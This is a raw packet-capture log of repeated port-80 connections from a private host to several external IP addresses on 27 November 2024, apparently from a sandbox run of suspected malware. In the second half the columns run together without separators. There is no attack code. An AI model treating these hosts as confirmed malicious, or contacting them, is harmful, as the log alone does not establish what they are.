Nov 27, 2024 08:55:08.993829012 CET | 49983 | 80 | 192.168.2.6 | 185.27.134.144
Nov 27, 2024 08:55:09.113727093 CET | 80 | 49983 | 185.27.134.144 | 192.168.2.6
Nov 27, 2024 08:55:10.226185083 CET | 80 | 49983 | 185.27.134.144 | 192.168.2.6
Nov 27, 2024 08:55:10.226356983 CET | 80 | 49983 | 185.27.134.144 | 192.168.2.6
Nov 27, 2024 08:55:10.226445913 CET | 49983 | 80 | 192.168.2.6 | 185.27.134.144
Nov 27, 2024 08:55:10.501709938 CET | 49983 | 80 | 192.168.2.6 | 185.27.134.144
Nov 27, 2024 08:55:11.521661997 CET | 49990 | 80 | 192.168.2.6 | 185.27.134.144
Nov 27, 2024 08:55:11.641714096 CET | 80 | 49990 | 185.27.134.144 | 192.168.2.6
Nov 27, 2024 08:55:11.641911983 CET | 49990 | 80 | 192.168.2.6 | 185.27.134.144
Nov 27, 2024 08:55:11.659991026 CET | 49990 | 80 | 192.168.2.6 | 185.27.134.144
Nov 27, 2024 08:55:11.780143023 CET | 80 | 49990 | 185.27.134.144 | 192.168.2.6
Nov 27, 2024 08:55:12.937143087 CET | 80 | 49990 | 185.27.134.144 | 192.168.2.6
Nov 27, 2024 08:55:12.937212944 CET | 80 | 49990 | 185.27.134.144 | 192.168.2.6
Nov 27, 2024 08:55:12.937311888 CET | 49990 | 80 | 192.168.2.6 | 185.27.134.144
Nov 27, 2024 08:55:13.173682928 CET | 49990 | 80 | 192.168.2.6 | 185.27.134.144
Nov 27, 2024 08:55:14.192763090 CET | 49997 | 80 | 192.168.2.6 | 185.27.134.144
Nov 27, 2024 08:55:14.312994957 CET | 80 | 49997 | 185.27.134.144 | 192.168.2.6
Nov 27, 2024 08:55:14.313277006 CET | 49997 | 80 | 192.168.2.6 | 185.27.134.144
Nov 27, 2024 08:55:14.328850985 CET | 49997 | 80 | 192.168.2.6 | 185.27.134.144
Nov 27, 2024 08:55:14.449410915 CET | 80 | 49997 | 185.27.134.144 | 192.168.2.6
Nov 27, 2024 08:55:14.449425936 CET | 80 | 49997 | 185.27.134.144 | 192.168.2.6
Nov 27, 2024 08:55:15.609050035 CET | 80 | 49997 | 185.27.134.144 | 192.168.2.6
Nov 27, 2024 08:55:15.609150887 CET | 80 | 49997 | 185.27.134.144 | 192.168.2.6
Nov 27, 2024 08:55:15.611282110 CET | 49997 | 80 | 192.168.2.6 | 185.27.134.144
Nov 27, 2024 08:55:15.847841978 CET | 49997 | 80 | 192.168.2.6 | 185.27.134.144
Nov 27, 2024 08:55:16.865685940 CET | 50003 | 80 | 192.168.2.6 | 185.27.134.144
Nov 27, 2024 08:55:16.986175060 CET | 80 | 50003 | 185.27.134.144 | 192.168.2.6
Nov 27, 2024 08:55:16.986259937 CET | 50003 | 80 | 192.168.2.6 | 185.27.134.144
Nov 27, 2024 08:55:16.996102095 CET | 50003 | 80 | 192.168.2.6 | 185.27.134.144
Nov 27, 2024 08:55:17.116048098 CET | 80 | 50003 | 185.27.134.144 | 192.168.2.6
Nov 27, 2024 08:55:18.327203989 CET | 80 | 50003 | 185.27.134.144 | 192.168.2.6
Nov 27, 2024 08:55:18.327219009 CET | 80 | 50003 | 185.27.134.144 | 192.168.2.6
Nov 27, 2024 08:55:18.327397108 CET | 50003 | 80 | 192.168.2.6 | 185.27.134.144
Nov 27, 2024 08:55:18.330173969 CET | 50003 | 80 | 192.168.2.6 | 185.27.134.144
Nov 27, 2024 08:55:18.450107098 CET | 80 | 50003 | 185.27.134.144 | 192.168.2.6
Nov 27, 2024 08:55:23.982042074 CET | 50006 | 80 | 192.168.2.6 | 172.67.145.234
Nov 27, 2024 08:55:24.102086067 CET | 80 | 50006 | 172.67.145.234 | 192.168.2.6
Nov 27, 2024 08:55:24.107898951 CET | 50006 | 80 | 192.168.2.6 | 172.67.145.234
Nov 27, 2024 08:55:24.187865973 CET | 50006 | 80 | 192.168.2.6 | 172.67.145.234
Nov 27, 2024 08:55:24.307867050 CET | 80 | 50006 | 172.67.145.234 | 192.168.2.6
Nov 27, 2024 08:55:25.328429937 CET | 80 | 50006 | 172.67.145.234 | 192.168.2.6
Nov 27, 2024 08:55:25.329098940 CET | 80 | 50006 | 172.67.145.234 | 192.168.2.6
Nov 27, 2024 08:55:25.329251051 CET | 50006 | 80 | 192.168.2.6 | 172.67.145.234
Nov 27, 2024 08:55:25.706006050 CET | 50006 | 80 | 192.168.2.6 | 172.67.145.234
Nov 27, 2024 08:55:26.784035921 CET | 50007 | 80 | 192.168.2.6 | 172.67.145.234
Nov 27, 2024 08:55:26.904187918 CET | 80 | 50007 | 172.67.145.234 | 192.168.2.6
Nov 27, 2024 08:55:26.904267073 CET | 50007 | 80 | 192.168.2.6 | 172.67.145.234
Nov 27, 2024 08:55:26.934150934 CET | 50007 | 80 | 192.168.2.6 | 172.67.145.234
Nov 27, 2024 08:55:27.054265976 CET | 80 | 50007 | 172.67.145.234 | 192.168.2.6
Nov 27, 2024 08:55:28.174063921 CET | 80 | 50007 | 172.67.145.234 | 192.168.2.6
Nov 27, 2024 08:55:28.174990892 CET | 80 | 50007 | 172.67.145.234 | 192.168.2.6
Nov 27, 2024 08:55:28.178586960 CET | 50007 | 80 | 192.168.2.6 | 172.67.145.234
Nov 27, 2024 08:55:28.439415932 CET | 50007 | 80 | 192.168.2.6 | 172.67.145.234
Nov 27, 2024 08:55:29.459873915 CET | 50008 | 80 | 192.168.2.6 | 172.67.145.234
Nov 27, 2024 08:55:29.579875946 CET | 80 | 50008 | 172.67.145.234 | 192.168.2.6
Nov 27, 2024 08:55:29.587871075 CET | 50008 | 80 | 192.168.2.6 | 172.67.145.234
Nov 27, 2024 08:55:29.599221945 CET | 50008 | 80 | 192.168.2.6 | 172.67.145.234
Nov 27, 2024 08:55:29.719300985 CET | 80 | 50008 | 172.67.145.234 | 192.168.2.6
Nov 27, 2024 08:55:29.719337940 CET | 80 | 50008 | 172.67.145.234 | 192.168.2.6
Nov 27, 2024 08:55:30.869734049 CET | 80 | 50008 | 172.67.145.234 | 192.168.2.6
Nov 27, 2024 08:55:30.870346069 CET | 80 | 50008 | 172.67.145.234 | 192.168.2.6
Nov 27, 2024 08:55:30.870400906 CET | 50008 | 80 | 192.168.2.6 | 172.67.145.234
Nov 27, 2024 08:55:31.111133099 CET | 50008 | 80 | 192.168.2.6 | 172.67.145.234
Nov 27, 2024 08:55:32.133913994 CET | 50009 | 80 | 192.168.2.6 | 172.67.145.234
Nov 27, 2024 08:55:32.253834009 CET | 80 | 50009 | 172.67.145.234 | 192.168.2.6
Nov 27, 2024 08:55:32.254204988 CET | 50009 | 80 | 192.168.2.6 | 172.67.145.234
Nov 27, 2024 08:55:32.265881062 CET | 50009 | 80 | 192.168.2.6 | 172.67.145.234
Nov 27, 2024 08:55:32.385843992 CET | 80 | 50009 | 172.67.145.234 | 192.168.2.6
Nov 27, 2024 08:55:33.460850954 CET | 80 | 50009 | 172.67.145.234 | 192.168.2.6
Nov 27, 2024 08:55:33.461503029 CET | 80 | 50009 | 172.67.145.234 | 192.168.2.6
Nov 27, 2024 08:55:33.466809988 CET | 50009 | 80 | 192.168.2.6 | 172.67.145.234
Nov 27, 2024 08:55:33.466809988 CET | 50009 | 80 | 192.168.2.6 | 172.67.145.234
Nov 27, 2024 08:55:33.586783886 CET | 80 | 50009 | 172.67.145.234 | 192.168.2.6
Nov 27, 2024 08:55:38.844063997 CET | 50010 | 80 | 192.168.2.6 | 172.67.167.146
Nov 27, 2024 08:55:38.964724064 CET | 80 | 50010 | 172.67.167.146 | 192.168.2.6
Nov 27, 2024 08:55:38.964802027 CET | 50010 | 80 | 192.168.2.6 | 172.67.167.146
Nov 27, 2024 08:55:38.984736919 CET | 50010 | 80 | 192.168.2.6 | 172.67.167.146
Nov 27, 2024 08:55:39.104706049 CET | 80 | 50010 | 172.67.167.146 | 192.168.2.6
Nov 27, 2024 08:55:40.463380098 CET | 80 | 50010 | 172.67.167.146 | 192.168.2.6
Nov 27, 2024 08:55:40.464117050 CET | 80 | 50010 | 172.67.167.146 | 192.168.2.6
Nov 27, 2024 08:55:40.464204073 CET | 50010 | 80 | 192.168.2.6 | 172.67.167.146
Nov 27, 2024 08:55:40.486237049 CET | 50010 | 80 | 192.168.2.6 | 172.67.167.146
Nov 27, 2024 08:55:41.566339016 CET | 50011 | 80 | 192.168.2.6 | 172.67.167.146
Nov 27, 2024 08:55:41.686306953 CET | 80 | 50011 | 172.67.167.146 | 192.168.2.6
Nov 27, 2024 08:55:41.691871881 CET | 50011 | 80 | 192.168.2.6 | 172.67.167.146
Nov 27, 2024 08:55:41.763883114 CET | 50011 | 80 | 192.168.2.6 | 172.67.167.146
Nov 27, 2024 08:55:41.883898973 CET | 80 | 50011 | 172.67.167.146 | 192.168.2.6
Nov 27, 2024 08:55:43.124485016 CET | 80 | 50011 | 172.67.167.146 | 192.168.2.6
Nov 27, 2024 08:55:43.124512911 CET | 80 | 50011 | 172.67.167.146 | 192.168.2.6
Nov 27, 2024 08:55:43.124581099 CET | 50011 | 80 | 192.168.2.6 | 172.67.167.146
Nov 27, 2024 08:55:43.267594099 CET | 50011 | 80 | 192.168.2.6 | 172.67.167.146
Nov 27, 2024 08:55:44.427268028 CET | 50012 | 80 | 192.168.2.6 | 172.67.167.146
Nov 27, 2024 08:55:44.547177076 CET | 80 | 50012 | 172.67.167.146 | 192.168.2.6
Nov 27, 2024 08:55:44.547256947 CET | 50012 | 80 | 192.168.2.6 | 172.67.167.146
Nov 27, 2024 08:55:44.569236040 CET | 50012 | 80 | 192.168.2.6 | 172.67.167.146
Nov 27, 2024 08:55:44.689306974 CET | 80 | 50012 | 172.67.167.146 | 192.168.2.6
Nov 27, 2024 08:55:44.689331055 CET | 80 | 50012 | 172.67.167.146 | 192.168.2.6
Nov 27, 2024 08:55:45.943701982 CET | 80 | 50012 | 172.67.167.146 | 192.168.2.6
Nov 27, 2024 08:55:45.944235086 CET | 80 | 50012 | 172.67.167.146 | 192.168.2.6
Nov 27, 2024 08:55:45.948009968 CET | 50012 | 80 | 192.168.2.6 | 172.67.167.146
Nov 27, 2024 08:55:46.079998970 CET | 50012 | 80 | 192.168.2.6 | 172.67.167.146
Nov 27, 2024 08:55:47.100380898 CET | 50013 | 80 | 192.168.2.6 | 172.67.167.146
Nov 27, 2024 08:55:47.220602989 CET | 80 | 50013 | 172.67.167.146 | 192.168.2.6
Nov 27, 2024 08:55:47.220877886 CET | 50013 | 80 | 192.168.2.6 | 172.67.167.146
Nov 27, 2024 08:55:47.230771065 CET | 50013 | 80 | 192.168.2.6 | 172.67.167.146
Nov 27, 2024 08:55:47.350852966 CET | 80 | 50013 | 172.67.167.146 | 192.168.2.6
Nov 27, 2024 08:55:48.702327013 CET | 80 | 50013 | 172.67.167.146 | 192.168.2.6
Nov 27, 2024 08:55:48.702573061 CET | 80 | 50013 | 172.67.167.146 | 192.168.2.6
Nov 27, 2024 08:55:48.702630043 CET | 50013 | 80 | 192.168.2.6 | 172.67.167.146
Nov 27, 2024 08:55:48.707631111 CET | 50013 | 80 | 192.168.2.6 | 172.67.167.146
Nov 27, 2024 08:55:48.827528954 CET | 80 | 50013 | 172.67.167.146 | 192.168.2.6
Nov 27, 2024 08:55:54.158648014 CET | 50014 | 80 | 192.168.2.6 | 154.88.22.101
Nov 27, 2024 08:55:54.278762102 CET | 80 | 50014 | 154.88.22.101 | 192.168.2.6
Nov 27, 2024 08:55:54.278929949 CET | 50014 | 80 | 192.168.2.6 | 154.88.22.101
Nov 27, 2024 08:55:54.296211958 CET | 50014 | 80 | 192.168.2.6 | 154.88.22.101
Nov 27, 2024 08:55:54.416407108 CET | 80 | 50014 | 154.88.22.101 | 192.168.2.6
Nov 27, 2024 08:55:55.802009106 CET | 50014 | 80 | 192.168.2.6 | 154.88.22.101
Nov 27, 2024 08:55:55.855292082 CET | 80 | 50014 | 154.88.22.101 | 192.168.2.6
Nov 27, 2024 08:55:55.855467081 CET | 80 | 50014 | 154.88.22.101 | 192.168.2.6
Nov 27, 2024 08:55:55.855473995 CET | 50014 | 80 | 192.168.2.6 | 154.88.22.101
Nov 27, 2024 08:55:55.856594086 CET | 50014 | 80 | 192.168.2.6 | 154.88.22.101
Nov 27, 2024 08:55:55.922112942 CET | 80 | 50014 | 154.88.22.101 | 192.168.2.6
Nov 27, 2024 08:55:55.922214985 CET | 50014 | 80 | 192.168.2.6 | 154.88.22.101
                                                                Nov 27, 2024 08:55:56.818949938 CET5001580192.168.2.6154.88.22.101
                                                                Nov 27, 2024 08:55:56.938868046 CET8050015154.88.22.101192.168.2.6
                                                                Nov 27, 2024 08:55:56.939021111 CET5001580192.168.2.6154.88.22.101
                                                                Nov 27, 2024 08:55:56.956094027 CET5001580192.168.2.6154.88.22.101
                                                                Nov 27, 2024 08:55:57.249279022 CET8050015154.88.22.101192.168.2.6
                                                                Nov 27, 2024 08:55:58.471009016 CET5001580192.168.2.6154.88.22.101
                                                                Nov 27, 2024 08:55:58.505959034 CET8050015154.88.22.101192.168.2.6
                                                                Nov 27, 2024 08:55:58.505985975 CET8050015154.88.22.101192.168.2.6
                                                                Nov 27, 2024 08:55:58.506011963 CET5001580192.168.2.6154.88.22.101
                                                                Nov 27, 2024 08:55:58.506038904 CET5001580192.168.2.6154.88.22.101
                                                                Nov 27, 2024 08:55:58.591023922 CET8050015154.88.22.101192.168.2.6
                                                                Nov 27, 2024 08:55:58.591080904 CET5001580192.168.2.6154.88.22.101
                                                                Nov 27, 2024 08:55:59.489352942 CET5001680192.168.2.6154.88.22.101
                                                                Nov 27, 2024 08:55:59.610743046 CET8050016154.88.22.101192.168.2.6
                                                                Nov 27, 2024 08:55:59.610939980 CET5001680192.168.2.6154.88.22.101
                                                                Nov 27, 2024 08:55:59.627667904 CET5001680192.168.2.6154.88.22.101
                                                                Nov 27, 2024 08:55:59.748486996 CET8050016154.88.22.101192.168.2.6
                                                                Nov 27, 2024 08:55:59.748500109 CET8050016154.88.22.101192.168.2.6
                                                                Nov 27, 2024 08:56:01.142486095 CET5001680192.168.2.6154.88.22.101
                                                                Nov 27, 2024 08:56:01.189699888 CET8050016154.88.22.101192.168.2.6
                                                                Nov 27, 2024 08:56:01.189759970 CET5001680192.168.2.6154.88.22.101
                                                                Nov 27, 2024 08:56:01.189857006 CET8050016154.88.22.101192.168.2.6
                                                                Nov 27, 2024 08:56:01.189908981 CET5001680192.168.2.6154.88.22.101
                                                                Nov 27, 2024 08:56:01.262469053 CET8050016154.88.22.101192.168.2.6
                                                                Nov 27, 2024 08:56:01.262526035 CET5001680192.168.2.6154.88.22.101
                                                                Nov 27, 2024 08:56:02.167025089 CET5001780192.168.2.6154.88.22.101
                                                                Nov 27, 2024 08:56:02.287851095 CET8050017154.88.22.101192.168.2.6
                                                                Nov 27, 2024 08:56:02.287952900 CET5001780192.168.2.6154.88.22.101
                                                                Nov 27, 2024 08:56:02.297992945 CET5001780192.168.2.6154.88.22.101
                                                                Nov 27, 2024 08:56:02.418543100 CET8050017154.88.22.101192.168.2.6
                                                                Nov 27, 2024 08:56:03.874685049 CET8050017154.88.22.101192.168.2.6
                                                                Nov 27, 2024 08:56:03.874866009 CET8050017154.88.22.101192.168.2.6
                                                                Nov 27, 2024 08:56:03.874999046 CET5001780192.168.2.6154.88.22.101
                                                                Nov 27, 2024 08:56:03.877856016 CET5001780192.168.2.6154.88.22.101
                                                                Nov 27, 2024 08:56:03.997760057 CET8050017154.88.22.101192.168.2.6
                                                                Nov 27, 2024 08:56:09.327404976 CET5001980192.168.2.6209.74.77.107
                                                                Nov 27, 2024 08:56:09.447407007 CET8050019209.74.77.107192.168.2.6
                                                                Nov 27, 2024 08:56:09.448103905 CET5001980192.168.2.6209.74.77.107
                                                                Nov 27, 2024 08:56:09.463917971 CET5001980192.168.2.6209.74.77.107
                                                                Nov 27, 2024 08:56:09.583956003 CET8050019209.74.77.107192.168.2.6
                                                                Nov 27, 2024 08:56:10.717557907 CET8050019209.74.77.107192.168.2.6
                                                                Nov 27, 2024 08:56:10.717694044 CET8050019209.74.77.107192.168.2.6
                                                                Nov 27, 2024 08:56:10.717750072 CET5001980192.168.2.6209.74.77.107
                                                                Nov 27, 2024 08:56:10.970623970 CET5001980192.168.2.6209.74.77.107
                                                                Nov 27, 2024 08:56:11.991965055 CET5002080192.168.2.6209.74.77.107
                                                                Nov 27, 2024 08:56:12.111979008 CET8050020209.74.77.107192.168.2.6
                                                                Nov 27, 2024 08:56:12.112127066 CET5002080192.168.2.6209.74.77.107
                                                                Nov 27, 2024 08:56:12.127145052 CET5002080192.168.2.6209.74.77.107
                                                                Nov 27, 2024 08:56:12.247159004 CET8050020209.74.77.107192.168.2.6
                                                                Nov 27, 2024 08:56:13.425523043 CET8050020209.74.77.107192.168.2.6
                                                                Nov 27, 2024 08:56:13.425589085 CET8050020209.74.77.107192.168.2.6
                                                                Nov 27, 2024 08:56:13.425645113 CET5002080192.168.2.6209.74.77.107
                                                                Nov 27, 2024 08:56:13.646107912 CET5002080192.168.2.6209.74.77.107
                                                                Nov 27, 2024 08:56:14.662377119 CET5002180192.168.2.6209.74.77.107
                                                                Nov 27, 2024 08:56:14.782305956 CET8050021209.74.77.107192.168.2.6
                                                                Nov 27, 2024 08:56:14.782394886 CET5002180192.168.2.6209.74.77.107
                                                                Nov 27, 2024 08:56:14.802114964 CET5002180192.168.2.6209.74.77.107
                                                                Nov 27, 2024 08:56:14.922374964 CET8050021209.74.77.107192.168.2.6
                                                                Nov 27, 2024 08:56:14.922890902 CET8050021209.74.77.107192.168.2.6
                                                                Nov 27, 2024 08:56:16.166023970 CET8050021209.74.77.107192.168.2.6
                                                                Nov 27, 2024 08:56:16.166107893 CET8050021209.74.77.107192.168.2.6
                                                                Nov 27, 2024 08:56:16.168442965 CET5002180192.168.2.6209.74.77.107
                                                                Nov 27, 2024 08:56:16.314327002 CET5002180192.168.2.6209.74.77.107
                                                                Nov 27, 2024 08:56:17.334602118 CET5002280192.168.2.6209.74.77.107
                                                                Nov 27, 2024 08:56:17.454557896 CET8050022209.74.77.107192.168.2.6
                                                                Nov 27, 2024 08:56:17.456115007 CET5002280192.168.2.6209.74.77.107
                                                                Nov 27, 2024 08:56:17.466828108 CET5002280192.168.2.6209.74.77.107
                                                                Nov 27, 2024 08:56:17.586822033 CET8050022209.74.77.107192.168.2.6
                                                                Nov 27, 2024 08:56:18.770761967 CET8050022209.74.77.107192.168.2.6
                                                                Nov 27, 2024 08:56:18.770864964 CET8050022209.74.77.107192.168.2.6
                                                                Nov 27, 2024 08:56:18.770935059 CET5002280192.168.2.6209.74.77.107
                                                                Nov 27, 2024 08:56:18.775660038 CET5002280192.168.2.6209.74.77.107
                                                                Nov 27, 2024 08:56:18.895581007 CET8050022209.74.77.107192.168.2.6
                                                                Nov 27, 2024 08:56:32.732027054 CET5002380192.168.2.6104.21.34.103
                                                                Nov 27, 2024 08:56:32.852140903 CET8050023104.21.34.103192.168.2.6
                                                                Nov 27, 2024 08:56:32.852240086 CET5002380192.168.2.6104.21.34.103
                                                                Nov 27, 2024 08:56:32.873037100 CET5002380192.168.2.6104.21.34.103
                                                                Nov 27, 2024 08:56:32.993100882 CET8050023104.21.34.103192.168.2.6
                                                                Nov 27, 2024 08:56:34.006324053 CET8050023104.21.34.103192.168.2.6
                                                                Nov 27, 2024 08:56:34.006381989 CET8050023104.21.34.103192.168.2.6
                                                                Nov 27, 2024 08:56:34.006572962 CET5002380192.168.2.6104.21.34.103
                                                                Nov 27, 2024 08:56:34.006823063 CET8050023104.21.34.103192.168.2.6
                                                                Nov 27, 2024 08:56:34.007127047 CET5002380192.168.2.6104.21.34.103
                                                                Nov 27, 2024 08:56:34.377137899 CET5002380192.168.2.6104.21.34.103
                                                                Nov 27, 2024 08:56:35.396023989 CET5002580192.168.2.6104.21.34.103
                                                                Nov 27, 2024 08:56:35.517731905 CET8050025104.21.34.103192.168.2.6
                                                                Nov 27, 2024 08:56:35.520107985 CET5002580192.168.2.6104.21.34.103
                                                                Nov 27, 2024 08:56:35.538594961 CET5002580192.168.2.6104.21.34.103
                                                                Nov 27, 2024 08:56:35.658591032 CET8050025104.21.34.103192.168.2.6
                                                                Nov 27, 2024 08:56:36.721002102 CET8050025104.21.34.103192.168.2.6
                                                                Nov 27, 2024 08:56:36.721071959 CET8050025104.21.34.103192.168.2.6
                                                                Nov 27, 2024 08:56:36.721112013 CET5002580192.168.2.6104.21.34.103
                                                                Nov 27, 2024 08:56:36.721604109 CET8050025104.21.34.103192.168.2.6
                                                                Nov 27, 2024 08:56:36.721653938 CET5002580192.168.2.6104.21.34.103
                                                                Nov 27, 2024 08:56:37.048721075 CET5002580192.168.2.6104.21.34.103
                                                                Nov 27, 2024 08:56:38.067290068 CET5002680192.168.2.6104.21.34.103
                                                                Nov 27, 2024 08:56:38.187422037 CET8050026104.21.34.103192.168.2.6
                                                                Nov 27, 2024 08:56:38.188107014 CET5002680192.168.2.6104.21.34.103
                                                                Nov 27, 2024 08:56:38.205075979 CET5002680192.168.2.6104.21.34.103
                                                                Nov 27, 2024 08:56:38.325197935 CET8050026104.21.34.103192.168.2.6
                                                                Nov 27, 2024 08:56:38.325222015 CET8050026104.21.34.103192.168.2.6
                                                                Nov 27, 2024 08:56:39.338416100 CET8050026104.21.34.103192.168.2.6
                                                                Nov 27, 2024 08:56:39.338449955 CET8050026104.21.34.103192.168.2.6
                                                                Nov 27, 2024 08:56:39.338466883 CET8050026104.21.34.103192.168.2.6
                                                                Nov 27, 2024 08:56:39.338499069 CET5002680192.168.2.6104.21.34.103
                                                                Nov 27, 2024 08:56:39.338532925 CET5002680192.168.2.6104.21.34.103
                                                                Nov 27, 2024 08:56:39.723970890 CET5002680192.168.2.6104.21.34.103
                                                                Nov 27, 2024 08:56:40.742420912 CET5002780192.168.2.6104.21.34.103
                                                                Nov 27, 2024 08:56:40.862565994 CET8050027104.21.34.103192.168.2.6
                                                                Nov 27, 2024 08:56:40.862642050 CET5002780192.168.2.6104.21.34.103
                                                                Nov 27, 2024 08:56:40.873210907 CET5002780192.168.2.6104.21.34.103
                                                                Nov 27, 2024 08:56:40.993180037 CET8050027104.21.34.103192.168.2.6
                                                                Nov 27, 2024 08:56:42.065346003 CET8050027104.21.34.103192.168.2.6
                                                                Nov 27, 2024 08:56:42.065392017 CET8050027104.21.34.103192.168.2.6
                                                                Nov 27, 2024 08:56:42.065407038 CET8050027104.21.34.103192.168.2.6
                                                                Nov 27, 2024 08:56:42.065646887 CET5002780192.168.2.6104.21.34.103
                                                                Nov 27, 2024 08:56:42.066020012 CET8050027104.21.34.103192.168.2.6
                                                                Nov 27, 2024 08:56:42.068067074 CET5002780192.168.2.6104.21.34.103
                                                                Nov 27, 2024 08:56:42.070724010 CET5002780192.168.2.6104.21.34.103
                                                                Nov 27, 2024 08:56:42.190783978 CET8050027104.21.34.103192.168.2.6
                                                                Nov 27, 2024 08:56:50.035285950 CET5002880192.168.2.620.2.249.7
                                                                Nov 27, 2024 08:56:50.155344963 CET805002820.2.249.7192.168.2.6
                                                                Nov 27, 2024 08:56:50.155442953 CET5002880192.168.2.620.2.249.7
                                                                Nov 27, 2024 08:56:50.172189951 CET5002880192.168.2.620.2.249.7
                                                                Nov 27, 2024 08:56:50.292216063 CET805002820.2.249.7192.168.2.6
                                                                Nov 27, 2024 08:56:51.697618961 CET5002880192.168.2.620.2.249.7
                                                                Nov 27, 2024 08:56:51.774771929 CET805002820.2.249.7192.168.2.6
                                                                Nov 27, 2024 08:56:51.774874926 CET805002820.2.249.7192.168.2.6
                                                                Nov 27, 2024 08:56:51.774983883 CET5002880192.168.2.620.2.249.7
                                                                Nov 27, 2024 08:56:51.774983883 CET5002880192.168.2.620.2.249.7
                                                                Nov 27, 2024 08:56:51.817643881 CET805002820.2.249.7192.168.2.6
                                                                Nov 27, 2024 08:56:51.819631100 CET5002880192.168.2.620.2.249.7
                                                                Nov 27, 2024 08:56:52.709042072 CET5002980192.168.2.620.2.249.7
                                                                Nov 27, 2024 08:56:52.829227924 CET805002920.2.249.7192.168.2.6
                                                                Nov 27, 2024 08:56:52.829319954 CET5002980192.168.2.620.2.249.7
                                                                Nov 27, 2024 08:56:52.847362041 CET5002980192.168.2.620.2.249.7
                                                                Nov 27, 2024 08:56:52.967319965 CET805002920.2.249.7192.168.2.6
                                                                Nov 27, 2024 08:56:54.376807928 CET5002980192.168.2.620.2.249.7
                                                                Nov 27, 2024 08:56:54.440880060 CET805002920.2.249.7192.168.2.6
                                                                Nov 27, 2024 08:56:54.440903902 CET805002920.2.249.7192.168.2.6
                                                                Nov 27, 2024 08:56:54.441010952 CET5002980192.168.2.620.2.249.7
                                                                Nov 27, 2024 08:56:54.441010952 CET5002980192.168.2.620.2.249.7
                                                                Nov 27, 2024 08:56:54.496773005 CET805002920.2.249.7192.168.2.6
                                                                Nov 27, 2024 08:56:54.500158072 CET5002980192.168.2.620.2.249.7
                                                                Nov 27, 2024 08:56:55.411627054 CET5003080192.168.2.620.2.249.7
                                                                Nov 27, 2024 08:56:55.531769991 CET805003020.2.249.7192.168.2.6
                                                                Nov 27, 2024 08:56:55.539005041 CET5003080192.168.2.620.2.249.7
                                                                Nov 27, 2024 08:56:55.554179907 CET5003080192.168.2.620.2.249.7
                                                                Nov 27, 2024 08:56:55.674333096 CET805003020.2.249.7192.168.2.6
                                                                Nov 27, 2024 08:56:55.676035881 CET805003020.2.249.7192.168.2.6
                                                                Nov 27, 2024 08:56:57.065491915 CET5003080192.168.2.620.2.249.7
                                                                Nov 27, 2024 08:56:57.113641024 CET805003020.2.249.7192.168.2.6
                                                                Nov 27, 2024 08:56:57.113708973 CET5003080192.168.2.620.2.249.7
                                                                Nov 27, 2024 08:56:57.186182022 CET805003020.2.249.7192.168.2.6
                                                                Nov 27, 2024 08:56:57.186254025 CET5003080192.168.2.620.2.249.7
                                                                Nov 27, 2024 08:56:58.083734989 CET5003180192.168.2.620.2.249.7
                                                                Nov 27, 2024 08:56:58.203701019 CET805003120.2.249.7192.168.2.6
                                                                Nov 27, 2024 08:56:58.203910112 CET5003180192.168.2.620.2.249.7
                                                                Nov 27, 2024 08:56:58.214248896 CET5003180192.168.2.620.2.249.7
                                                                Nov 27, 2024 08:56:58.334281921 CET805003120.2.249.7192.168.2.6
                                                                Nov 27, 2024 08:56:59.823905945 CET805003120.2.249.7192.168.2.6
                                                                Nov 27, 2024 08:56:59.823920012 CET805003120.2.249.7192.168.2.6
                                                                Nov 27, 2024 08:56:59.824151993 CET5003180192.168.2.620.2.249.7
                                                                Nov 27, 2024 08:56:59.826939106 CET5003180192.168.2.620.2.249.7
                                                                Nov 27, 2024 08:56:59.946896076 CET805003120.2.249.7192.168.2.6
                                                                Nov 27, 2024 08:57:05.401720047 CET5003280192.168.2.6156.251.17.224
                                                                Nov 27, 2024 08:57:05.521718979 CET8050032156.251.17.224192.168.2.6
                                                                Nov 27, 2024 08:57:05.521881104 CET5003280192.168.2.6156.251.17.224
                                                                Nov 27, 2024 08:57:05.537626028 CET5003280192.168.2.6156.251.17.224
                                                                Nov 27, 2024 08:57:05.657712936 CET8050032156.251.17.224192.168.2.6
                                                                Nov 27, 2024 08:57:07.048896074 CET5003280192.168.2.6156.251.17.224
                                                                Nov 27, 2024 08:57:07.093499899 CET8050032156.251.17.224192.168.2.6
                                                                Nov 27, 2024 08:57:07.093514919 CET8050032156.251.17.224192.168.2.6
                                                                Nov 27, 2024 08:57:07.093566895 CET5003280192.168.2.6156.251.17.224
                                                                Nov 27, 2024 08:57:07.093605995 CET5003280192.168.2.6156.251.17.224
                                                                Nov 27, 2024 08:57:07.168941021 CET8050032156.251.17.224192.168.2.6
                                                                Nov 27, 2024 08:57:07.168996096 CET5003280192.168.2.6156.251.17.224
                                                                Nov 27, 2024 08:57:08.069226980 CET5003380192.168.2.6156.251.17.224
                                                                Nov 27, 2024 08:57:08.189742088 CET8050033156.251.17.224192.168.2.6
                                                                Nov 27, 2024 08:57:08.196127892 CET5003380192.168.2.6156.251.17.224
                                                                Nov 27, 2024 08:57:08.217842102 CET5003380192.168.2.6156.251.17.224
                                                                Nov 27, 2024 08:57:08.337991953 CET8050033156.251.17.224192.168.2.6
                                                                Nov 27, 2024 08:57:09.720988035 CET5003380192.168.2.6156.251.17.224
                                                                Nov 27, 2024 08:57:09.753113985 CET8050033156.251.17.224192.168.2.6
                                                                Nov 27, 2024 08:57:09.753168106 CET5003380192.168.2.6156.251.17.224
                                                                Nov 27, 2024 08:57:09.753184080 CET8050033156.251.17.224192.168.2.6
                                                                Nov 27, 2024 08:57:09.753226995 CET5003380192.168.2.6156.251.17.224
                                                                Nov 27, 2024 08:57:09.841042042 CET8050033156.251.17.224192.168.2.6
                                                                Nov 27, 2024 08:57:09.841108084 CET5003380192.168.2.6156.251.17.224
                                                                Nov 27, 2024 08:57:10.739938974 CET5003480192.168.2.6156.251.17.224
                                                                Nov 27, 2024 08:57:10.860043049 CET8050034156.251.17.224192.168.2.6
                                                                Nov 27, 2024 08:57:10.864264965 CET5003480192.168.2.6156.251.17.224
                                                                Nov 27, 2024 08:57:10.880908966 CET5003480192.168.2.6156.251.17.224
                                                                Nov 27, 2024 08:57:11.001034975 CET8050034156.251.17.224192.168.2.6
                                                                Nov 27, 2024 08:57:11.001076937 CET8050034156.251.17.224192.168.2.6
                                                                Nov 27, 2024 08:57:12.400871038 CET8050034156.251.17.224192.168.2.6
                                                                Nov 27, 2024 08:57:12.400913000 CET8050034156.251.17.224192.168.2.6
                                                                Nov 27, 2024 08:57:12.400971889 CET5003480192.168.2.6156.251.17.224
                                                                Nov 27, 2024 08:57:13.316037893 CET5003480192.168.2.6156.251.17.224
